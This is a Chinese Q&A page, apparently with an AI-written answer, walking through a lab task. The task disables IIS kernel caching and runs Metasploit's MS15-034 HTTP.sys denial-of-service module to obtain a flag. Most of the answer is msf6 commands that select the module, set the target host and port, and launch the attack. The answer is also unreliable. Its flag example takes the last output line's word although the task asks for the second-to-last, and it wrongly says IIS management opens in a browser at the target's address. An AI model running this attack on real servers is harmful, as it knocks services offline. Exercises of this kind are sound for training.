进入靶机在IIS网站下的编辑输出缓存设置中禁止启用内核缓存,再次运行MS15034HTTP.SYS漏洞的拒绝服务攻击模块,运行此模块并将回显结果中倒数第2行的最后一个单词作为Flag值提交
时间: 2024-02-16 12:03:22 浏览: 112
好的,以下是在禁用内核缓存后再次运行MS15034HTTP.SYS漏洞的拒绝服务攻击模块,并获取Flag值的步骤:
1. 进入靶机的IIS管理界面
在浏览器中输入`http://<靶机IP>`,进入靶机的IIS管理界面。
2. 进入编辑输出缓存设置
在IIS管理界面中,找到需要禁用内核缓存的网站,进入该网站的“编辑输出缓存”设置页面。
3. 禁用内核缓存
在“编辑输出缓存”设置页面中,找到“高级设置”选项卡,将“启用内核缓存”选项设置为“false”,并点击“确定”按钮保存设置。
4. 调用漏洞攻击模块
```
msf6 > use auxiliary/dos/windows/http/ms15_034_http_sys_memory_dos
```
5. 设置目标IP地址
```
msf6 auxiliary(dos/windows/http/ms15_034_http_sys_memory_dos) > set RHOST <目标IP>
```
请将`<目标IP>`替换为您要攻击的目标IP地址。
6. 设置攻击参数
```
msf6 auxiliary(dos/windows/http/ms15_034_http_sys_memory_dos) > set THREADS <线程数>
msf6 auxiliary(dos/windows/http/ms15_034_http_sys_memory_dos) > set RPORT <目标端口>
```
其中,`<线程数>`为要使用的线程数量,建议默认值为1;`<目标端口>`为要攻击的目标端口,默认值为80。
7. 运行攻击模块
```
msf6 auxiliary(dos/windows/http/ms15_034_http_sys_memory_dos) > run
```
运行攻击模块后,将会自动对目标IP进行拒绝服务攻击。
8. 获取Flag值
执行完毕后,将回显结果中倒数第2行的最后一个单词作为Flag值提交即可。例如:
```
[*] Sending DoS packets to <目标IP>:80 (press CTRL+C to stop)
[-] <目标IP> - DoS failed: Connection refused
[*] Auxiliary module execution completed
```
则Flag值为:`completed`。
阅读全文